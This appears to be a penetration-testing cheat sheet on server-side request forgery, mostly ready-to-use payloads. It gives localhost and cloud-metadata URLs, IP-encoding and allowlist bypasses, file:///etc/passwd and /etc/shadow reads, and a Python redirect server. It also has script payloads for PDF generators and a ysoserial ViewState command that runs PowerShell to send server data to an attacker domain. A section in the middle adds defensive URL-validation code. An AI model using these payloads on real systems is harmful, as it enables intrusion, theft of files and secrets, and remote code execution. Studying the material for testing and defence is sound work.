# SSRF

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

<figure><img src="/files/2edRXPvdlgAi5NCTgBW9" alt=""><figcaption></figcaption></figure>

## Detection - Vulnerable Parameters

```
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}
```

{% embed url="<https://labs.detectify.com/security-guidance/ssrf-vulnerabilities-and-where-to-find-them/>" %}

{% embed url="<https://github.com/MindPatch/lorsrf>" %}

## Burp extension

Collaborator everywhere

{% embed url="<https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968>" %}

## Basic payload

```
http://127.0.0.1
```

```
127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost
localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
localhost:+11211aaa
localhost:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3.3.3.3/
127.1.1.1:80\@127.2.2.2:80/
127.1.1.1:80\@@127.2.2.2:80/
127.1.1.1:80:\@@127.2.2.2:80/
127.1.1.1:80#\@127.2.2.2:80/
```

### Payload List

{% embed url="<https://github.com/coffinxp/payloads/blob/main/ssrf.txt>" %}

### SSRF to LFI

{% content-ref url="/pages/JrFm2DfMRvUJ0bx03YhO" %}
[File Inclusion LFI / RFI](/0xss0rz/pentest/web-attacks/file-inclusion-lfi-rfi.md)
{% endcontent-ref %}

```
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/passwd?/../passwd
```

## Finding SSRF with Burp

Match: `https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)`

Replace: `https://{YOUR_SERVER}/` (for example your Burp Collaborator hostname)

<figure><img src="/files/phIfOHlgDtcXo4AJ1Jbw" alt=""><figcaption></figcaption></figure>

Source: <https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03>

{% embed url="<https://dant0x65.medium.com/bug-bounty-tip-automating-ssrf-ea344ec59962>" %}

## Port scan

```
http://127.0.0.1:§80§
```

<figure><img src="/files/QetwLTxe9p95NmcUagpM" alt=""><figcaption></figcaption></figure>

List of common ports

{% embed url="<https://gist.githubusercontent.com/sidxparab/45fe9c487a4d7b793b44ac92ec156b36/raw/a3862b37d4671d3446fc27bba4bbbe5667355b09/common-web-ports.txt>" %}

## Filter Bypass

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass>" %}

Burp extension

{% embed url="<https://github.com/hackerassociate/SSRF-Hacks-IP-Decimal>" %}

### Decimal notation

```
http://2130706433 equals http://127.0.0.1.
```

{% embed url="<https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4>" %}

### Other notation

```
127.1 equals 127.0.0.1
```

<figure><img src="/files/lLN9vLe56hyYhFJzaJQd" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/vysecurity/IPFuscator>" %}

```
IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0

IP Address:     127.0.0.1

Decimal:        2130706433
Hexadecimal:    0x7f000001
Octal:          017700000001

Full Hex:       0x7f.0x0.0x0.0x1
Full Oct:       0177.0.0.01

Random Padding:
Hex:    0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct:    00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001

Random base:
#1:     0x7f.0x0.0.01
#2:     0x7f.0x0.0x0.1
#3:     0177.0x0.0x0.0x1
#4:     0x7f.0.0.01
#5:     127.0x0.0.0x1

Random base with random padding:
#1:     127.0x00000000.000000.000000000000000001
#2:     127.0x0000000000000.0x00000000000000000000000000000.0001
#3:     0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4:     0000000000000000000177.0.000000.1
#5:     127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001
```

{% embed url="<https://github.com/whiteSHADOW1234/MorphURL>" %}

```
1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31
```

More payload: <https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass>

### IP encoding

Here IP 8.8.4.4 (Google DNS) is used:

```
8.8.1028 → Partial Decimal (Class B)
Combines the 3rd and 4th octets: 4 × 256 + 4 = 1028

8.525316 → Partial Decimal (Class A)
Combines the last three octets into one decimal number

0x08.8.004.004 → Mixed Encoding
Hexadecimal + Decimal + Octal (segment by segment)

0x08.0x08.004.004 → Double Hex + Octal
Two segments in hex, two in octal

0x08.010.4.4 → Hex + Octal + Decimal Mix

134743044 → Single Decimal
Full 32-bit integer representation of the IP

0x08080404 → Full Hexadecimal IP
Entire IP encoded as a single hex literal

010.010.004.004 → All Octal
Each segment padded with 0 to force octal interpretation

0x8.0x8.0x4.0x4 → Hex per Segment
All four octets encoded individually in hex

8.8.0x404 → Partial Hex (Class B)
Last segment in hex: 0x404 = 1028
```

### Use your own server to redirect on localhost

{% embed url="<https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530>" %}

`redirector.py`:

```
#!/usr/bin/env python3
# Minimal HTTP server that answers every request with a 302 redirect to the
# URL given on the command line. Usage: redirector.py <port_number> <url>

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("""
Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()


class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        # Every GET is redirected to the target URL
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

    def send_error(self, code, message=None):
        # Unsupported methods and malformed requests get the same redirect
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()


HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```

Run redirector server:

```
python3 redirector.py 80 http://127.0.0.1
```

Victim payload: `http://[YOUR_IP]`

<figure><img src="/files/g4WNSvXDmVYl7TX7XopH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/04Pz4r7N3H7NHZ24dulO" alt=""><figcaption></figcaption></figure>

### DNS Rebinding

{% embed url="<https://lock.cmpxchg8b.com/rebinder.html>" %}

<figure><img src="/files/WHYlSU5CctrKb2lgIJlA" alt=""><figcaption></figcaption></figure>

Also try `127.0.0.1` and `169.254.169.254`

<figure><img src="/files/RWZ3UIo5f8601ZK2fq0b" alt=""><figcaption></figcaption></figure>

{% embed url="<https://mokhansec.medium.com/bypassing-filters-ssrf-exploitation-via-dns-rebinding-with-just-1-in-30-successful-requests-2fdc3a9cfd7d>" %}

{% embed url="<https://medium.com/@amnotacat/using-wayback-and-dns-rebinding-for-ssrf-a5a16f611acc>" %}

{% embed url="<https://blog.securelayer7.net/server-side-request-forgery-dns-rebinding-attack/>" %}

### More payloads

{% embed url="<https://gist.github.com/rootsploit/66c9ae8fc3ef387fa5ffbb67fcef0766>" %}

Also check [Payload List](#payload-list)

## Cloud Metadata IP

```
169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376
```

{% embed url="<https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet>" %}

## URL / Host Validation Bypass

{% embed url="<http://freedns.afraid.org/subdomain/>" %}

<figure><img src="/files/tMzk6IURNdPoSG7Set46" alt=""><figcaption></figcaption></figure>

```
https://assets.example.com.attacker.com/
```

Replace `{CANARY_TOKEN}` with your controlled hostname and replace `example.com` with a whitelisted target host.

```
.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me
```

{% embed url="<https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet>" %}

{% embed url="<https://www.youtube.com/watch?v=3VJKmARDzJ4>" %}

### Bypassing protocol whitelists <a href="#id-3-bypassing-protocol-whitelists" id="id-3-bypassing-protocol-whitelists"></a>

```
//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%0D/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}
```

## URL Schemes

`file://`, `dict://`, `sftp://`, `ldap://`, `tftp://`, `gopher://`
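The notations collected above (decimal, octal, hex and short-form IPv4 literals, percent-encoded hosts, IPv4-mapped IPv6, userinfo and backslash tricks, `example.com.attacker.com`, the metadata address, alternative schemes and ports, and redirects to localhost) all defeat validators that compare strings instead of canonical addresses. The following is an added example written for this page, not code from the page or from any tool it links to: a Python check that normalises a URL the way a lenient C-library client would (via `socket.inet_aton`), resolves the host, and refuses anything that lands on a non-public address, plus a small helper that applies the same check to the URL-bearing parameters from the Detection list when reviewing request logs. The allowlist, port set and the `demo_resolver` table are constructed for the demonstration; a real deployment keeps the default `socket.getaddrinfo` resolver.

```python
# Added example, not code from this page or any project it cites.
# Defensive URL check that canonicalises the IP spellings listed on this page
# before deciding whether a server-side fetch is allowed, plus a log-review
# helper that applies the same check to request parameters.
import ipaddress
import socket
from urllib.parse import parse_qsl, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}          # assumption: only default web ports
# Parameter names from the "Detection" list above that usually carry a URL.
URL_PARAMS = {"url", "dest", "redirect", "uri", "next", "host", "domain",
              "callback", "return", "site", "feed", "to", "path"}


def lenient_ipv4(host):
    """IPv4 address as the C library's inet_aton() reads ``host``: decimal
    (2130706433), hex (0x7f000001), octal (017700000001), mixed-base and
    short forms (127.1, 8.8.1028). None if it is not an IPv4 literal."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def resolve_all(host, resolver=socket.getaddrinfo):
    """Every address ``host`` maps to. IP literals are normalised locally;
    names go through ``resolver`` (injectable so the check is testable
    offline). IPv6 scope suffixes such as %eth0 are dropped."""
    addr = lenient_ipv4(host)
    if addr is None:
        try:
            addr = ipaddress.ip_address(host)        # IPv6 literal, e.g. ::1
        except ValueError:
            addr = None
    if addr is not None:
        return [addr]
    return [ipaddress.ip_address(info[4][0].split("%")[0])
            for info in resolver(host, None)]


def is_forbidden(addr):
    """True for loopback, RFC 1918, link-local (169.254.169.254), unspecified
    (0.0.0.0, ::), multicast and reserved ranges. IPv4-mapped IPv6 such as
    ::ffff:127.0.0.1 is judged by its embedded IPv4 address."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def check_url(url, allowed_hosts=None, resolver=socket.getaddrinfo):
    """Return (ok, reason). Rejects non-http(s) schemes, userinfo tricks
    (user@127.0.0.1, 127.1.1.1:80\\@127.2.2.2), percent-encoded or non-ASCII
    hosts, unexpected ports, hosts outside ``allowed_hosts`` (exact match, so
    assets.example.com.attacker.com fails) and any non-public address."""
    try:
        parts = urlsplit(url.strip())
        port = parts.port                 # raises on a non-numeric port
    except ValueError as exc:
        return False, "unparseable URL: %s" % exc
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if "%" in host or not host.isascii():
        return False, "encoded or non-ASCII host"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %s" % port
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host not in allowlist: %s" % host
    try:
        addrs = resolve_all(host, resolver)
    except (OSError, ValueError) as exc:
        return False, "cannot resolve %s: %s" % (host, exc)
    for addr in addrs:
        if is_forbidden(addr):
            return False, "%s resolves to non-public address %s" % (host, addr)
    return True, "ok"


def flag_query(query_string, resolver=socket.getaddrinfo):
    """Log-review helper: the URL-bearing parameters of one request query
    string whose value fails check_url(), mapped to the reason."""
    hits = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name.lower() in URL_PARAMS:
            ok, reason = check_url(value, resolver=resolver)
            if not ok:
                hits[name] = reason
    return hits


# Constructed name table standing in for DNS, so the demo runs offline.
_DEMO_DNS = {"intranet.example": "10.0.0.5", "public.example": "8.8.4.4",
             "localhost": "127.0.0.1"}


def demo_resolver(host, port):
    """getaddrinfo() look-alike backed by the constructed table above."""
    if host not in _DEMO_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (_DEMO_DNS[host], 0))]


if __name__ == "__main__":
    for sample in ("http://2130706433/", "http://0xA9.254.0251.0376/",
                   "http://[0:0:0:0:0:ffff:127.0.0.1]/thefile",
                   "https://public.example/"):
        print(sample, check_url(sample, resolver=demo_resolver))
```

Two caveats that the DNS rebinding and redirect sections above make concrete. First, this check resolves the name once; the HTTP client resolves it again at connect time, so a rebinding name can pass the check and then connect elsewhere. Connect to the address the check vetted (most clients let you pin the resolved IP or hook the connection) rather than to the name. Second, the check covers only the first URL: a fetch that follows redirects will happily follow a `302 Location: http://127.0.0.1` from a server like `redirector.py`, so disable automatic redirects or run `check_url` on every `Location` before following it.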

## Gopher

{% embed url="<https://infosecwriteups.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630>" %}

{% embed url="<https://github.com/tarunkant/Gopherus>" %}

## Blind SSRF with OOB

{% embed url="<https://github.com/assetnote/blind-ssrf-chains?s=03>" %}

{% embed url="<https://tcm-sec.com/find-and-exploit-blind-ssrf-with-out-of-band-oob-techniques/>" %}

See [Use your own server to redirect on localhost](#use-your-own-server-to-redirect-on-localhost)

### Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

{% embed url="<https://github.com/projectdiscovery/interactsh>" %}

## SSRF (XSS) in PDF Generator

{% content-ref url="/pages/3ptIFDNOAiza85XhvHQO" %}
[XSS](/0xss0rz/pentest/web-attacks/xss.md)
{% endcontent-ref %}

{% embed url="<https://medium.com/@armaanpathan/pdfreacter-ssrf-to-root-level-local-file-read-which-led-to-rce-eb460ffb3129>" %}

```
<iframe src="http://localhost/"></iframe>
```

```
<iframe src=file:///etc/passwd></iframe>
"/><iframe src="file:///etc/shadow"></iframe>
```

```
<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(x.responseText));x.open('GET','http://127.0.0.1');x.send();</script>

<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>

<!-- Using embed -->
<embed src="http://127.0.0.1" />

<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />

<!-- Loading external stylesheet/script -->
<link rel="stylesheet" href="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>

<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />

<!-- Loading external image -->
<img src="http://127.0.0.1" />

<!-- Loading external SVG -->
<svg><image href="http://127.0.0.1" /></svg>

<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
```

```
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>
```

```
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>
```

{% hint style="info" %}
*Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!*
{% endhint %}

{% embed url="<https://www.blackhillsinfosec.com/hunting-for-ssrf-bugs-in-pdf-generators/>" %}

{% embed url="<https://infosecwriteups.com/exploiting-ssrf-in-pdf-html-injection-basic-and-blind-047fec5317ae>" %}

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators>" %}

### PDF Generator - SSRF in .NET Application to RCE

{% embed url="<https://medium.com/@0xUN7H1NK4BLE/how-ssrf-leads-to-rce-in-a-net-application-ee1b13812245>" %}

```
<html>
<script>
    window.location='file:///C:/Windows/System32/drivers/etc/hosts'
</script>
</html>
```

Look for the encryption keys in `web.config`.

Craft a `ViewState` payload that executes a PowerShell command to exfiltrate server information:

```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -Command \"$w=(whoami); Invoke-WebRequest -Uri http://<attackerdomain>/aaaa?data=$w -UseBasicParsing\"" --path="<path>.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<decrypt-key>" --validationalg="SHA1" --validationkey="<key>"
```

## NextJS apps

{% content-ref url="/pages/QcjbFMTjwQZZ3tmdx1kN" %}
[Next.js / React / Vue.js](/0xss0rz/pentest/public-exploit/next.js-react-vue.js.md)
{% endcontent-ref %}

CVE-2024-34351, fixed in Next.js v14.1.1.

```
https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75
```

```
https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75
```

{% embed url="<https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps>" %}

## Tools

### SSRFHunter

{% embed url="<https://github.com/BotGJ16/SSRFHunter>" %}

### SSRFmap

{% embed url="<https://github.com/swisskyrepo/SSRFmap>" %}

### Autossrf

{% embed url="<https://github.com/Th0h0/autossrf>" %}

### 0dSSRF

{% embed url="<https://github.com/KariiemGamal/0dSSRF?s=03>" %}

### SSRFPwned

{% embed url="<https://github.com/blackhatethicalhacking/SSRFPwned>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

## Resources

{% embed url="<https://www.yeswehack.com/fr/learn-bug-bounty/server-side-request-forgery-ssrf>" %}

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Server%20Side%20Request%20Forgery.md>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/ssrf-a-complete-guide-to-exploiting-advanced-ssrf-vulnerabilities>" %}

{% embed url="<https://www.hackerone.com/application-security/how-server-side-request-forgery-ssrf>" %}

{% embed url="<https://highon.coffee/blog/ssrf-cheat-sheet/>" %}

{% embed url="<https://owasp.org/Top10/fr/A10_2021-Server-Side_Request_Forgery_(SSRF)/>" %}

{% embed url="<https://portswigger.net/web-security/ssrf>" %}

{% embed url="<https://www.imperva.com/learn/application-security/server-side-request-forgery-ssrf/>" %}

{% embed url="<https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html>" %}

{% embed url="<https://www.intigriti.com/hackademy/server-side-request-forgery-ssrf>" %}

{% embed url="<https://infosecwriteups.com/i-studied-100-ssrf-reports-and-heres-what-i-learned-1654c72ee2df>" %}
